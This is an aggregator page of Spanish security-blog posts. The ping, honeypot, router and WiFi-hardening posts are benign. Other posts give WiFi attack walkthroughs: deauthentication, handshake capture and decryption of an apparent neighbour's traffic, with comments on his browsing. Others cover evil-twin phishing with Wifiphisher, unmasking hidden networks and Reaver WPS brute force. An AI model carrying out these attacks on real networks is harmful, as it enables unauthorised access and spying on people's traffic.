Quantcast
Channel: Red [IN]Segura
Viewing all 28 articles
Browse latest View live

Como usar el comando Ping en conexiones de Redes [Ejemplos prácticos]

$
0
0

Como utilizar el comando PING para probar la conectividad, el funcionamiento, la disponibilidad de una red, saber el tiempo de respuesta en una conexión y conocer la dirección IP correspondiente a un dominio en internet, entre otras tareas posibles.

Ping.exe es una pequeña aplicación disponible en todos los sistemas Windows, que se ejecuta con el comando PING, usada para probar la conectividad de redes.
Es uno de las más sencillas y útiles herramientas para ejecutar cualquier diagnostico ante conflictos en la red o simplemente para estar seguros de la funcionalidad de cualquier conexión.
Ping comprueba la conexión enviando paquetes de solicitud de eco y de respuesta, muestra si se ha recibido una respuesta del destino y cuánto tiempo se ha tardado en recibirla. Si se produce un error en la entrega muestra un mensaje de error. Es un mecanismo similar al empleado por submarinos y otras naves al utilizar el sonar, en este caso el medio de transmisión no es el agua si no las redes informáticas.


Usos prácticos del comando ping

Ping es posible utilizarlo en infinidad de tareas en el trabajo en redes, algunos de los usos prácticos más empleados son los siguientes:

« Comprobar la conectividad de una red.
« Medir la latencia o tiempo que tardan en comunicarse dos puntos remotos.
« En internet conocer la dirección IP utilizada por un nombre de dominio.
« Scripts que permiten llevar un registro de la disponibilidad de un servidor remoto.
« Scripts que permiten conocer cuando existe conexión en un equipo.
« En los archivos batch es empleado ocasionalmente para retrasar la ejecución de comandos un tiempo determinado.


Como ejecutar el comando ping.

Para ejecutar el comando ping en su forma más elemental utiliza: PING dirección_ip
Por ejemplo:

ping 127.0.0.1

Es posible insertar la petición a ping en la consola de cmd o directamente en el cuadro de Inicio o Ejecutar, en estos últimos casos al completarse el comando se cerrará la ventana de cmd y no podremos ver los resultados.
Para ejecutarlo insertándolo en el cuadro de Inicio y lograr que permanezca abierta la ventana con el resultado utiliza:cmd /k ping dirección_ip y presiona la tecla Enter.

Al ejecutar ping sin parámetros, de forma predeterminada se enviarán 4 solicitudes de eco, con el tiempo de espera de 1 segundo, el tamaño de 32 bytes y con la fragmentación permitida.
Para usar otras opciones es necesario especificar los parámetros de acuerdo a la necesidad.
La respuesta obtenida en el caso anterior será algo similar a lo siguiente:

Haciendo ping a dirección_ip con 32 bytes de datos:



Respuesta desde 127.0.0.1: bytes=32 tiempo= <10 ms TTL=128

Respuesta desde 127.0.0.1: bytes=32 tiempo= <10 ms TTL=128

Respuesta desde 127.0.0.1: bytes=32 tiempo= <10 ms TTL=128

Respuesta desde 127.0.0.1: bytes=32 tiempo= <10 ms TTL=128

TTL= es el tiempo de vida del paquete enviado y su valor óptimo es 128
En la respuesta obtenida de ping pueden aparecer algunos de los siguientes errores:
“Red de destino inaccesible” significa que no existe ninguna ruta al destino.
“Ha terminado el tiempo de espera para esta solicitud” indica errores en la conexión.


Opciones y parámetros más utilizados con el comando ping


Modificador

Uso

-n   Determina el número de solicitudes de eco que se van a enviar. El valor predeterminado es 4.
-w   Permite ajustar el tiempo de espera (en milisegundos). El valor predeterminado es 1.000 (tiempo de espera de un 1 segundo).
-l   Permite ajustar el tamaño del paquete de ping. El tamaño predeterminado es 32 bytes.
-f   No fragmentar en paquetes. De manera predeterminada, el paquete ping permite la fragmentación.
-a   Resolver direcciones en nombres de host
-i   Tiempo de vida o TTL
-r   Registrar la ruta de saltos de cuenta.


Usar el comando ping para probar la conectividad en una red

A pesar de su aparente simpleza es muy efectivo el uso del comando ping para el diagnóstico, detección de fallos y comprobación de la disponibilidad de cualquier red.
A continuación ejemplo de pruebas que se pueden efectuar en una red local para verificar el funcionamiento y para identificar y aislar cualquier error presente.
La supuesta red de ejemplo posee los siguientes parámetros:

Dirección IP del equipo: 192.168.137.3
Dirección IP de otra PC en la misma red: 192.168.137.5
Puerta de enlace (equipo en la red con conexión a internet): 192.168.137.1

1- Hacer ping a 127.0.0.1, es la dirección localhost o dirección de loopback de nuestro mismo equipo, en caso de tener éxito demuestra que el protocolo TCP/IP está instalado y funcionando de forma correcta. De no ser así es necesario reinstalarlo.
Para reinstalar el protocolo TCP/IP utiliza:
En Windows XP: netsh int ip reset resetlog.txt
En Vista y Windows 7: netsh interface ipv4 reset

2- Hacer ping a la dirección IP del equipo: ping 192.168.137.3.
De tener éxito demuestra que la tarjeta o adaptador de red funciona correctamente, de no ser así desinstala el dispositivo y reinicia Windows para reinstalarlo automáticamente.
Para desinstalar el dispositivo es necesario acceder al Administrador de dispositivos, para eso introduce en Inicio o Ejecutar devmgmt.msc y oprime Enter.

3- Hacer ping a la dirección IP del otro equipo en red: ping 192.168.137.5
De tener éxito demuestra que las conexiones físicas entre ellos son correctas.

4- Hacer ping a la dirección IP de la puerta de enlace: ping 192.168.137.1
De tener éxito demuestra que existe conexión con el equipo que suministra internet.

5- Hacer ping a la dirección IP de un sitio en internet: ping 192.168.137.1
De tener éxito demuestra que la conexión a internet funciona.

6- Por ultimo hacer ping a un dominio en internet: ping google.com
De tener éxito demuestra que existe conexión a internet y los servidores DNS configurados en la conexión funcionan correctamente.


Ejemplos prácticos del uso del comando ping

Son múltiples las tareas en las que se puede emplear el comando ping y no solo para diagnosticar la conectividad, para la cual es una magnifica herramienta; a continuación se irán agregando sucesivamente aplicaciones prácticas en las cuales es posible utilizarlo.


Usar el comando ping para comprobar disponibilidad de dominios

Para comprobar dominios utiliza:

PING -w 7500 dominio |find "TTL="&& ECHO dominio encontrado
PING -w 7500 dominio |find "TTL=" || ECHO dominio no encontrado


Usar el comando ping para conocer la dirección IP

Para conocer la dirección IP que corresponde a un dominio utiliza:

ping -a gratisprogramas.org
Para conocer la dirección IP desde donde se ha enviado un correo electrónico o email utiliza: ping mail.dominio y oprime Enter, sustituye dominio por el utilizado en la dirección electrónica de la cual quieres conocer la dirección IP.
Por ejemplo, el correo fué enviado desde alejandro@Fernandez.es, utiliza:

ping mail.fernandez.es


Usar el comando ping para conocer la lejanía de un servidor

Para conocer la lejanía de un servidor web determinado utiliza:

PING servidor  -n 10
El promedio del tiempo de respuesta que se muestra en: “Tiempos aproximados de ida y vuelta en milisegundos” debe ser no mayor de 300ms.


Usar el comando ping para comprobar si existe fragmentación en la conexión

Para comprobar si existe desfragmentación en paquetes enviados, usando el valor MTU predeterminado utiliza:

ping google.com -f -l 1472
ping google.com -f -l 576 (conexiones dialup)


Usar el comando ping para monitorear disponibilidad de un servidor

Código para crear un archivo batch que permite monitorear la conexión a un sitio web (ejemplo.com) cada 20 segundos. Util para monitorear la disponibilidad de un servidor con multiples caidas. Puede ser utilizado también para comprobar el servicio suministrado por tu ISP (Proveedor de acceso a internet), solo reemplaza ejemplo.com por la dirección IP correspondiente.

Código: DOS
  1. @echo off
  2.  
  3. echo Realizando ping, usa CTRL-C para detenerlo
  4. :start
  5. ping -n 1 ejemplo.com | find “TTL=” >>%userprofile%\Desktop\pingtest.txt
  6. ping -n 16 127.0.0.1>nul
  7. goto start


Usar el comando ping para conocer si hay conexión a internet

Código para crear un archivo batch que comprueba cada 30 segundos si existe conexión a internet en el equipo local. Se logra el retraso de 30 segundos haciendo ping a una dirección IP 1.1.1.1 inexistente con el parámetro -w 30000 y posteriormente se repite el ciclo.

Código: DOS
  1. @echo off
  2.  
  3. color 0E
  4. mode con cols=70 lines=8
  5. : START
  6. SET CONNECT=SI
  7. PING 72.14.204.147 | FIND “TTL=” >NUL
  8. IFERRORLEVEL 1 SET CONNECT=NO
  9. ECHO%CONNECT% tienes conexion a internet en este momento
  10. PING 1.1.1.1 -n 10 -w 30000 >NUL
  11. CLS
  12. GOTO START
  13. pause>nul
  14. :SI
  15. ECHO Estas conectado a internet
  16. PING 1.1.1.1 -n 1 -w 30000 >NUL
  17. CLS
  18. GOTO START
  19. pause>nul


Usar el comando ping para pausar la ejecución de un comando

Código para pausar la ejecución de un segundo comando en un archivo batch durante 60 segundos.

Código: DOS
  1. @echo off
  2.  
  3. echo Esperando 60 segundos...
  4. PING -w 10000 -n 1 1.1.1.1>NUL
  5. echo OK ha transcurrido 1 minuto


Más información: https://underc0de.org/foro/redes/como-usar-el-comando-ping-en-conexiones-de-redes-%28ejemplos-practicos%29/

NOVA (Network Obfuscation and Virtualized Anti-Reconnaissance)

$
0
0

Para los que queráis revisar sobre de que trata el tema de los honeypots, podéis mirar aquí: https://underc0de.org/foro/wireless/montando-un-honeypot/


Aviso: El post plantea una visión panorámica de la tools en base a la documentación que se cita en la fuente. Asumo la responsabilidad de los errores de traducción, no siendo esta literal ni lineal, sino una síntesis. 

¿Qué es NOVA?

NOVA, es una herramienta de código abierto que funciona bajo Linux.  Detecta (y previene) toda clase de reconocimientos a una red,  tanto de un atacante extraño a la misma, como alguien de dentro  (empleados no autorizados) que estén tratando explorar la infraestructura de la red, o incluso malware; por eso altamente eficaz para cooperar en el mantenimiento de la seguridad. 

¿Cómo funciona NOVA?

NOVA, posibilita la creación de múltiples máquinas virtuales en la red a proteger (bajo una versión mejorada de Honeyd) con la apariencia de reales, sirviendo de señuelo al intruso cuando, por ejemplo,  escanea con herramientas  como Nmap o Nessus; pero que en definitiva, cumplen la función de confundir el  objetivo del atacante por medio de los falsos nodos.





Por otra parte, en la detección de actividad, NOVA utiliza algoritmos de 'aprendizaje' automático, activándose las alertas cuando se detecta actividad sospechosa o intentos de penetración  hostil, por lo que no será necesario acudir a la búsqueda manual en los archivos de registro del honeypot. La intrusión  se notifica a los administradores mediante la generación de alarmas al correo o entradas syslog.





Con una interfaz web intuitiva, de sencilla configuración, ofrece la información recogida en los honeypots en una serie de cuadros, gráficos y  tablas de tráfico que muestran los intentos de intrusión, cuyos datos permiten a los administradores de los sistemas de seguridad determinar si existe una amenaza en la red.








En síntesis, se puede destacar:

-Limita los efectos de  ciber ataques internos y externos, detecta actividad sospechosa actuando como IDS, proporciona datos falsos a los atacantes, y alerta a los administradores de red de sucesos críticos.

-Impide a los atacantes hostiles de realizar el reconocimiento sobre redes privadas.

-Mejora el conocimiento de la situación sobre las redes.

- Útil para entrenar y formar equipos de trabajo en la detección de intrusiones a la red.


Github: https://github.com/DataSoft/Nova


Fuentes (en inglés):http: novanetworksecurity.com/
http://www.novanetworksecurity.com/downloads/Nova+User+Manual_Rev1-3.pdf

Seguridad en redes Wireless

$
0
0
 
 
Seguridad Wireless
 
La seguridad en redes wireless es un tema importante a tener en cuenta, pues son muchas las personas que dejan por defecto las configuraciones de fábrica y son fácilmente crackeables. "Pues la naturaleza de las redes wireless hace que cualquier persona pueda tener acceso a los datos que son enviados, debido a que estos utilizan como medio de transmisión el aire (ondas electromagnéticas). Esto plantea un problema añadido con respecto al cable. Para tener acceso a los datos transmitidos por cable se ha de tener acceso al mismo o a los dispositivos asociados. Para las redes wireless no es necesario, basta con que la señal viaje hasta nosotros."(información entre comillas de securitybydefault) si alguien se conectara a tu red podría: capturar tus credenciales de sitios web, espiar tu navegación, etc...

Medidas de prevención
 
1- Cambiar el ESSID de la red(El nombre por defecto, ejemplo:"ONO2A4S")
2- Cambiar la clave por defecto por una más segura combinando: mayúsculas, minúsculas, números y símbolos.
3- Deshabilitar el procolo WPS (Wi-Fi Protected Setup)
4- Usar cifrados WPA2 en vez de WEP o WPA.
5- Cuando estés fuera de casa sino lo necesitas apagar el router.
 
Se da por hecho que hoy en día estés usando cifrado WPA/2 en tu red Wireless, ahora el punto que podría definir debilidad o fortaleza en tu red es tu contraseña/clave, para ayudarte a elegir la más apropiada usaremos el sitio web de kurtm.net, el cual nos permite generar una contraseña con una longitud de caracteres personalizado o podemos elegir los 3 niveles que ofrece.


Falsa Seguridad [8 caracteres]

Seguridad Media

Seguridad Maxima

Numero de  caracteres personalizado, en este caso 42

Cabe aclarar que depende del modem o router utilizado admite hasta cierto número de caracteres, ahora si son paranoicos pueden personalizar la contraseña que el sitio web les ofrece, así será única y difícilmente será crackeable.

Capturando el tráfico de una red WiFi como un ninja

$
0
0

Una de las cosas que más nos debería preocupar cuando tenemos a un intruso en nuestra red de confianza (Red local de casa, del trabajo, etc.) es que capture el tráfico y lo analice, de forma que pueda controlar lo que estamos haciendo.

Una vez invadida una red WiFi podríamos intentar capturar tráfico con tcpdump, pero no tendríamos los resultados esperados. Una buena forma de hacerlo sería redirigir todo el tráfico de la red a nuestro equipo para poder analizarlo, pero ésto podría disparar varias alarmas.

The quieter you become, the more you are able to hear
El lema de BackTrack es lo que nos trae a buscar procedimientos más silenciosos, así que... ¿Cómo podemos capturar el tráfico de la red sin llamar la atención?

La respuesta es, como siempre: DEPENDE

Muchos hackers dan una respuesta muy tajante con respecto a la seguridad y el WiFi: No lo uses, usa cable. Pero ¿por qué son tan tajantes?



Algunos se amparan en la lógica de la velocidad de red. Está muy bien que con las redes WiFi N alcances 150Mbps, o que los 450Mbps con wifi a 5GHz, pero sigue siendo menos que la mitad que las redes Gigabit. Coherente, lógico y correcto. En eso es mejor el cable que el WiFi. ¿Pero qué más?

Seguridad. Utilizar WiFi es jugar con fuego bajo determinadas circunstancias, ya que el tráfico de la red se puede capturar sin estar conectado a la red (Cualquiera que sepa levantar claves WEP habrá capturado muchísimo tráfico antes de conocer la contraseña)

Una vez sabida la contraseña podríamos intentar descifrar todo el tráfico capturado para su posterior análisis en Ethereal. Pero en las redes WPA no es tan sencillo. Es muy fácil, pero no tanto.

¿Cómo se crackea una clave WPA?

No lo voy a explicar aquí en detalle, éso debéis estudiarlo en otros posts. Necesitamos llegar aquí sabiendo que necesitamos capturar el handshake de un cliente autenticado para hacerle un ataque por diccionario, hasta que el archivo se descifra correctamente y obtenemos el positivo.

Por esa regla de tres podemos deducir que si tenemos el handshake y la contraseña podemos descifrar los paquetes capturados para analizarlos después. Y para eso no necesitamos estar conectados a la red, sólo tener nuestra antena WiFi a la escucha.

El otro día estuve jugando con ataques de fuerza bruta contra WPS con un resultado fructífero. Usaré ese AP a modo de dummy. (Nota: Los posibles datos identificativos han sido editados)

Código: Text
  1. root@kali:/home/rand0m/neighbor# airodump-ng -w ahorateveo --bssid D8:61:FF:FF:FF:FF --essid VodafoneFFFF --channel  7 --output-format pcap -a wlan0mon

Lanzamos airodump-ng con los parámetros bssid y essid para filtrar sólo el tráfico de la red que nos interesa. Además le decimos que nos guarde el archivo ahorateveo en formato pcap.

Código: Text
  1.  CH  7 ][ Elapsed: 0 s ][ 2015-08-18 22:07
  2.  
  3.  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
  4.  
  5.  D8:61:FF:FF:FF:FF  -81 100       40        0    0   7  54e  WPA  CCMP   PSK  VodafoneFFFF
  6.  
  7.  BSSID              STATION            PWR   Rate    Lost    Frames  Probe

De primeras tenemos nuestra antena a la escucha y filtrando los paquetes de la red que queremos. Ahora necesitamos el handshake, así que lanzamos el ataque DEAUTH con aireplay-ng.

Código: Text
  1. root@kali:/home/rand0m/neighbor# aireplay-ng -0 0 -a D8:61:FF:FF:FF:FF wlan0mon
  2. 22:10:30  Waiting for beacon frame (BSSID: D8:61:FF:FF:FF:FF) on channel 7
  3. NB: this attack is more effective when targeting
  4. a connected wireless client (-c <client's mac>).
  5. 22:10:31  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  6. 22:10:32  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  7. 22:10:32  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  8. 22:10:33  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  9. 22:10:33  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  10. 22:10:34  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  11. 22:10:34  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  12. 22:10:34  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  13. 22:10:35  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  14. 22:10:35  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]

Hasta que conseguimos lo que queríamos: El WPA handshake.

Código: Text
  1.  CH  7 ][ Elapsed: 5 mins ][ 2015-08-18 22:12 ][ WPA handshake: D8:61:FF:FF:FF:FF
  2.  
  3.  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
  4.  
  5.  D8:61:FF:FF:FF:FF  -81 100       40        0    0   7  54e  WPA  CCMP   PSK  VodafoneFFFF
  6.  
  7.  BSSID              STATION            PWR   Rate    Lost    Frames  Probe
  8.  
  9.  D8:61:FF:FF:FF:FF  18:83:FF:FF:FF:FF  -74    1e- 6      0     4019  VodafoneFFFF

Ahora lo dejamos a la escucha y nos olvidamos. Vamos a dejarlo capturando unas horas y luego veremos qué nos encontramos.

Cuando tenemos un buen pino ya podemos ponernos a estudiar los datos recopilados.

Código: Text
  1.  CH  7 ] 9 hours 55 mins ][ 2015-08-19 08:02 ][ WPA handshake: D8:61:FF:FF:FF:FF
  2.  
  3.  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
  4.  
  5.  D8:61:FF:FF:FF:FF  -82  96   298434    99355    0   7  54e  WPA  CCMP   PSK  VodafoneFFFF
  6.  
  7.  BSSID              STATION            PWR   Rate    Lost    Frames  Probe
  8.  
  9.  D8:61:FF:FF:FF:FF  18:83:FF:FF:FF:FF  -75    1e- 6      0     1365  VodafoneFFFF

Ahora, para descifrarlo, usaremos la herramienta airdecap-ng, que viene con la suite de aircrack-ng.

Código: Text
  1. root@kali:/home/rand0m/neighbor# airdecap-ng -e VodafoneFFFF -b D8:61:FF:FF:FF:FF -p Underc0de ahorateveo-01.cap
  2. Total number of packets read       2532614
  3. Total number of WEP data packets         0
  4. Total number of WPA data packets     93405
  5. Number of plaintext data packets         0
  6. Number of decrypted WEP  packets         0
  7. Number of corrupted WEP  packets         0
  8. Number of decrypted WPA  packets     79414

Esto nos generará el archivo ahorateveo-01-dec.cap con los paquetes descifrados. Ya sólo nos queda abrirlo en Wireshark para poder analizar los datos recopilados.

Por ejemplo, viendo las consultas DNS realizadas podemos ver por dónde estuvo navegando.


Y podemos ver que es un chico malo malo que navega por piratebay y por páginas golfas. Lo típico que hace alguien relajándose mientras no hay nadie mirando, pero ¿cuántas veces creemos que no nos observan mientras sí lo hacen?

Además, como hablábamos al principio, los paquetes se capturaron del aire. No estoy conectado a la red, sólo conozco la contraseña.

NO aparezco conectado a su red. NO aparezco enviando tráfico sospechoso. Sólo escucho, descifro y analizo.

Autor: rand0m
Fuente: https://underc0de.org/foro/wireless/capturando-el-trafico-de-una-red-wifi-como-un-ninja

WIFIPHISHER: Tool de ataque contra redes Wi-Fi, bajo Kali Linux

$
0
0

Hola lectores y amigos  Hablemos de Wifiphisher! 


Señalada como herramienta de seguridad que realiza ataques phishing, rápidos y automatizados  contra redes seguras de Wi-Fi. El objetivo es obtener  credenciales de portales cautivos  o contraseñas de la víctima, mediante la técnica ‘Evil Twin’  en estrecha combinación con la ingeniería social, y a diferencia de otros métodos, no incluye fuerza bruta alguna.



En palabras de su desarrollador George Chatzisofroniou: “It's a social engineering attack that does not use brute forcing in contrast to other methods. It's an easy way to get WPA passwords"


WiFiPhisher, crea un falso punto de acceso enmascarando al legítimo y dirige un ataque de denegación de servicio (DoS) contra el AP auténtico con el fin que los usuarios se desconecten. Cuando la víctima intenta reconectar, wifiphisher responderá con un AP falso, que solicita confirmar  la pass simulando una actualización del firmware del router.


La herramienta que trabaja bajo Kali Linux está disponible en: 

Github


Fuente y mayor desarrollo en: thehackernews.com (en inglés).

PD: La traducción no es literal. 

Te interesan estos temas? Visítanos en Underc0de 



¿Redes ocultas? Averigua cómo ver el nombre

$
0
0



En este mini tutorial, les voy a enseñar a ver los nombres de las redes ocultas, que siempre es necesario saberlo tanto como para romper su password, como para conectarse.

Lo primero que debemos hacer, es poner nuestra interface en modo monitor. Comentaré brevemente este proceso, ya que lo he explicado varias veces en tutoriales previos.

1.- Identificamos el nombre de nuestra interface:


2.- La colocamos en modo monitor:


Lo mas probable, es que una vez hecho esto, su interface en modo monitor pase a llamarse mon0. En mi caso se llama wlan1, asique solo reemplacen el wlan1 por mon0 y listo.

El paso siguiente, es scannear y ver que redes hay disponibles. Para ellos utilizaremos el siguiente comando:


Y veremos algo como esto:


Como se ve en la captura, hay una red marcada en rojo llamada <length:    0>. Esta es nuestra red oculta. A su vez, con amarillo está resaltada su BSSID (MAC del Router). 

Por otro lado, en la parte inferior, este BSSID vuelve a aparecer, y a su derecha aparece un STATION. Esto quiere decir, que hay un cliente conectado a ese router.

Cabe resaltar que para poder obtener el nombre de la red, debe haber alguien conectado. De lo contrario no se podrá.

Detenemos el scanneo presionando CTRL + C y colocamos el siguiente comando:


El parámetro del -c es el numero del canal. En este caso esta red está en el canal 1. Y en --bssid va la MAC del router.

Lo que hará esto, será escuchar solo a esa red incógnita.



Ahora en otra consola, pondremos lo siguiente:


Este comando es el que se suele utilizar para sacar las claves WPA. En el parámetro -a pondremos la MAC del router y en el parámetro -C pondremos la MAC del cliente conectado.

Una vez hecho esto, aparecerá el nombre de la red oculta:


Espero que les sirva!

Saludos!
ANTRAX

Puedes ver más aquí

Visítanos en Underc0de

¿Necesitas hackear redes WPA/WPA-PSK?

$
0
0

Hola  amigos y lectores, les vengo a explicar como crackear redes WPA-WPA-PSK (Pre Shared Key), 

Comencemos.  Algunos se preguntarán, ¿qué es REAVER?

Reaver es una herramienta de fuerza bruta para redes WPS (Wi-Fi Protected Setup).

En primer lugar, lo que hacemos es encender nuestra tarjeta de red en modo de seguimiento, por lo que abrirá el terminal  (yo uso Linux Kali). Eso sería colocar:

Airmon-ng wlan0     (enter)

Para iniciar la tarjeta de red en modo monitor: 




Ahora, como podemos ver en la imagen, hemos puesto nuestra tarjeta de red en modo monitor, en este caso sería el mon0.  


Paso siguiente utilizaremos la herramienta llamada wifite.

Wifite es una herramienta programada en Python echa básicamente para encontrar redes cercanas a cualquier zona Wi-Fi. 

Lo siguiente, es  abrir otra pestaña, y colocamos wifite y damos enter.


Como se puede ver en la imagen anterior, escaneamos 2 redes WPS (WiFi Protected Setup)

- PIPE

- Movistar


Pero por ahora voy a elegir la red Wi-Fi y PIPE (XD) ya qué es la mía, y ahora sabemos que es vulnerable a los ataques Reaver por que es una red WPS.

Ahora tendremos que averiguar el BSSID (Basic Service Set Identificer) para iniciar el escaneo de fuerza bruta. Sabed que   el escaneo se demorará entre 16 a 19 horas, aproximadamente.

Funciona o solo sirve para redes WPA-PSK (Pre Shared Key), red pre-compartida o una red solo en casa, 

Algunos se preguntarán:

¿Qué es BSSID 
(Basic Service Set Identificer)?

BSSID 
(Basic Service Set Identificer) es un nombre de identificación del área local (LAN) inalámbrica de todos los paquetes. MAC ( Media Access Control) formado por 48 bits, del punto de acceso inalámbrico.

 A continuación, colocaremos en otra pestaña o terminal airodump-ng mon0 y le daremos enter.


Como observar  en la imagen, podemos ver la red BBSID  de las redes Wi-Fi. Ahora que sacamos la BBSID podemos comenzar a usar el Reaver para empezar a emplear fuerza bruta a la red Wi-Fi.  Esta herramienta no necesita utilizar ningún diccionario WPA-PSK antes WPA/WPA2 PSK. Recuerden   que se trata de "una red pre-compartida o solo en casa". La brute force se utiliza más para la recuperación de la contraseña  en casos de olvido, también. 

Así que  sigamos, ahora vamos a abrir otra terminal o pestaña y escribimos lo siguiente en el terminal:

reaver-i mon0-b F8: C3: 46:37:75:7 F-vv

Le daremos enter y nos aparecerá lo siguiente:


Como pueden ver en la imagen, cuando ejecutamos el comando nos comenzara analizar y trabajar sola, pero recuerden tener paciencia, ya que como escribí antes esto puede ser un proceso de hasta 16 horas o máximo 19.
No coloco la otra imagen ya con la contraseña y el PIN , por una cuestión de  precaución.
Espero que hayan entendido!

Por dudas, consultas o preguntas: AQUÍ.

Visítanos en Underc0de


Dónde queda 192.168.1.1?

$
0
0
192.168.1.1 es una dirección IP usada por muchas empresas fabricantes de routers para acceder a la configuración.


No existe ninguna duda que como usuario de Internet has escuchado sobre el término “dirección de IP”, sin embargo, si no eres un amante de la tecnología probablemente no sabrás qué significa esto con exactitud. La dirección IP está diseñada para que un dispositivo pueda comunicarse con otro a través del Internet. Todo dispositivo, así sea un ordenador, tablet o móvil, que se conecte a la web necesita una dirección IP, la cual ayudará a que cada uno se diferencie de los demás y que se le establezca una ubicación en el mundo.

Una buena analogía para entender qué es una IP es compararla con la dirección física de tu casa. Para que alguien pueda enviarte un paquete, necesitarán esa dirección. Lo mismo sucede cuando un ordenador remoto necesita comunicarse contigo, pero en este caso necesitará la dirección IP.

info

Algo que tienen en común ambas direcciones, es que muestran en qué parte del mundo estás y es por esto que algunos usuarios de Internet usan servicios de VPN para esconder su IP original. De esta manera nadie podrá saber desde dónde te estás conectando realmente, aumentando así la seguridad de la navegación.

Las IPs consisten en cuatro números separados por un punto y cada uno de ellos contiene entre uno y tres dígitos. Cada número puede comenzar en el cero y terminar en el 255. Por ejemplo: 78.125.0.255, o quizás 192.168.1.1.


192.168.1.1

Ya que sabemos qué es una dirección IP, entonces podemos hablar sobre 192.168.1.1. Esta IP en particular es una dirección privada que se usa para entrar en la configuración de la mayoría de los routers que están disponibles en el mercado. Marcas como Netgear y Linksys usan esta dirección IP para que puedas entrar a configurar los routers que ellos han fabricado, lo que hace que el usuario tenga la facilidad de aprenderse esta dirección para tenerla a la mano cuando la necesite en su propia red o en la de algún amigo o familiar.

direccion

The Be Box – Ports

Ya que los routers tienen 192.168.1.1 como dirección, todos los dispositivos que se conecten a esta red tendrán IPs similares: 192.168.1.2, 192.168.1.3 y así sucesivamente. Pero, hay que tener claro que estas IPs son privadas y sirven solo para identificar a un dispositivo dentro de una red local, también conocida como LAN.

Dónde queda 192.168.1.1?


¿Para qué se usa específicamente el 192.168.1.1?


Como dijimos, es una manera de configurar el router. Básicamente, tienes que escribir esta dirección en el navegador y aparecerá una página nueva donde podrás cambiar algunas funciones de tu enrutador. En la mayoría de los casos se te pedirá antes un nombre de usuario y una contraseña para poder entrar, pero si es la primera vez, la información estará en el manual. En otros casos no necesitarás nada adicional para entrar en la configuración, pero esto es un problema de seguridad con el que hay que lidiar.

Entrando a la configuración de tu router puedes cambiar el nombre de la red WiFi, crear una red invitada, detectar qué equipos se conectan a la red, cambiar la contraseña de acceso, cambiar los DNS, añadir controles parentales, y reiniciar el aparato cuando la conexión tiene fallos, solo por nombrar apenas algunas cosas.

internet

Hay que tener claro que no todos los routers usan esta dirección para entrar en su configuración. Esto no es una regla, solo es algo convencional, así que ha sido usado con frecuencia por los fabricantes de este tipo de dispositivos. Puedes averiguar cuál es la dirección para tu router revisando el manual o mirando en la parte de abajo del dispositivo.

Viewing all 28 articles
Browse latest View live